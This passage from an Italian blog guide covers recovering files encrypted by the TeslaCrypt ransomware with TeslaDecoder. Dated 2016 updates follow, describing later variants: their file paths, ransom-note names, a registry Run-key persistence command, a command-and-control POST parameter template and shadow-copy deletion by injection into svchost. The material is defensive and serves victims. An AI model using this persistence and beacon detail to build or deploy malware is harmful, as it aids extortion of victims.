Cliccare sul pulsante Set key. Verrà aperta la finestra Set custom key for decryption (vedi FIG 12). Nel campo Key (hex) specificare la chiave privata recuperata precedentemente e in Extension selezionare l'estensione dei file cifrati che si intende recuperare quindi cliccare su Set key per ritornare alla schermata precedente.
TeslaDecoder Set key
FIG 12 - TeslaDecoder Set key
Ritornando alla schermata precedente noteremo che i pulsanti Decrypt Folder e Decrypt All sono abilitati. Il primo ci consente di agire su una specifica cartella e relative sottocartelle, il secondo, invece, esegue una verifica sull'intero sistema recuperando i file cifrati. Prima di procedere ci viene richiesto se eliminare o mantenere la copia cifrata del file (se abbiamo dati importanti conviene tenere anche la versione cifrata del nostro file nel caso in cui l'operazione non sia riuscita a recuperare correttamente il suo contenuto).
TeslaDecoder cancellare i file criptati
FIG 13 - TeslaDecoder cancellare i file criptati

Conclusioni
Le raccomandazioni per evitare la perdita dei dati sono le solite: disporre di un buon antivirus e tenerlo sempre aggiornato, diffidare di siti ed email sospette, effettuare frequenti backup dei dati su più dispositivi esterni e non perennemente connessi al sistema. Per chi effettua il backup su cloud in genere i provider consentono di mantenere più "versioni" del file. In questi casi, se i file vengono crittografati da qualche ransomware, dovrebbe essere possibile recuperare una versione antecedente. 

Se questo articolo vi è stato d'aiuto a recuperare i vostri dati e volete offrirmi un caffè, potete utilizzare l'apposito link delle donazioni (le transazioni vengono gestite da paypal).


Aggiornamento del 05.02.2016
Al momento per i file cifrati da TeslaCrypt 3 aventi estensione .ttt, .xxx, .micro e .mp3 non esiste un metodo per estrarre la chiave dato che viene utilizzato un algoritmo diverso. Chi è stato colpito da tale variante di TeslaCrypt può effettuare un backup dei file cifrati in attesa che venga trovata una soluzione. Il tool TeslaDecoder è in continuo aggiornamento. Il ransomware può comunque essere rimosso seguendo i passaggi indicati nell'articolo. Provvederò ad aggiornare il presente articolo nel caso venga trovato il metodo per recuperare i dati cifrati da questa variante del ransomware.


Aggiornameno del 15.02.2016
Una nuova variante di TeslaCrypt 3.0 rinomina il file con estensione .mp3.


Aggiornamento del 18.03.2016
Ancora una brutta notizia. Non è stata trovato ancora alcun modo per decriptare i file con estensione .micro e .mp3 e, dal giorno 14.03.2016, si sta diffondendo una nuova versione di TeslaCrypt: TeslaCrypt 4.0. In quest'ultima versione i file vengono cifrati ma l'estensione non viene modificata. Tale comportamento renderà difficile riconoscere a colpo d'occhio i file cifrati sul disco. In questa nuova versione del ransomware, inoltre,  è stato corretto un BUG che corrompeva i file con grandezza superiore ai 4GB. Il file eseguibile del ransomware viene creato in 
%UserProfile%\Documenti\[caratteri_alfanumerici_random].exe
Le chiavi di registro coinvolte sono
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\_[caratteri_alfanumerici_random]
HKEY_CURRENT_USER\Software\
HKEY_CURRENT_USER\Software\Data


Aggiornamento del 26.04.2016
Da circa una settimana è in circolazione una nuova variante di TeslaCrypt: TeslaCrypt 4.1b.
Anche questa a nuova variante del ransomware è stata analizzata da BloodDolly di BleepingComputer e presenta alcune piccole modifiche rispetto alle versioni precedenti:
Il file di dati ora risulta  %MyDocuments%\desctop._ini 
Il file contentente le istruzioni ha una dimensione leggermente superiore rispetto alle versioni precedenti del ransomware.
%UserProfile%\Desktop\-!RecOveR!-[caratteri casuali]++.Txt
%UserProfile%\Desktop\-!RecOveR!-[caratteri casuali]++.Htm
%UserProfile%\Desktop\-!RecOveR!-[caratteri casuali]++.Png
%UserProfile%\Documents\-!recover!-!file!-.txt
L'eseguibile del ransomware viene creato con un nome random in Documenti:
%UserProfile%\Documents\[caratteri casuali].exe

Una volta che TeslaCrypt ha terminato la cifratura dei dati, contatta il server di comando e controllo inviando un messaggio di POST criptato:


Sub=Ping&dh=[PublicKeyRandom1_octet|AES_PrivateKeyMaster]&addr=[bitcoin_address]&size=0&version=4.1b&OS=[build_id]&ID=[?]&inst_id=[victim_id]

Anche in questa ultima versione ai file cifrati non viene aggiunta alcuna estensione.

Aggiornamento 04.05.2016
L'utente BloodDolly di BleepingComputer ha individuato e analizzato una nuova versione di TeslaCrypt: siamo alla versione 4.2. La nuova versione apporta alcuna piccole modifiche. Il messaggio che compare all'utente è stato modificato e vengono visualizzate solo le informazioni essenziali per procedere al pagamento del riscatto. Il codice è stato ottimizzato e compilato utilizzando un compilatore diverso da quello utilizzato nelle versioni precedenti del ransomware. La nuova versione di TeslaCrypt esegue l'injection code in svchost.exe per poter eliminare le copie shadow (operazione che viene eseguita sia prima che dopo aver cifrato i dati).
I file creati da TeslaCrypt 4.2 sono 
%UserProfile%\Desktop\!RecoveR!-[5 caratteri random]++.HTML
%UserProfile%\Desktop\!RecoveR!-[5 caratteri random]++.PNG
%UserProfile%\Desktop\!RecoveR!-[5 caratteri random]++.TXT
%UserProfile%\Documents\-!recover!-!file!-.txt
%UserProfile%\Documents\[random].exe

Il ransomware provvede a modificare la seguente chiave di registro per avviarsi ad ogni logon

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] serv[5 caratteri random] C:\Windows\SYSTEM32\CMD.EXE /C START "" "[malware].exe"



Aggiornamento del 19.05.2016

I server di TeslaCrypt chiudono e gli sviluppatori hanno rilasciato la master key utile per decriptare i dati da tutte le versioni di TeslaCrypt. Per maggiori informazioni potete cliccare QUI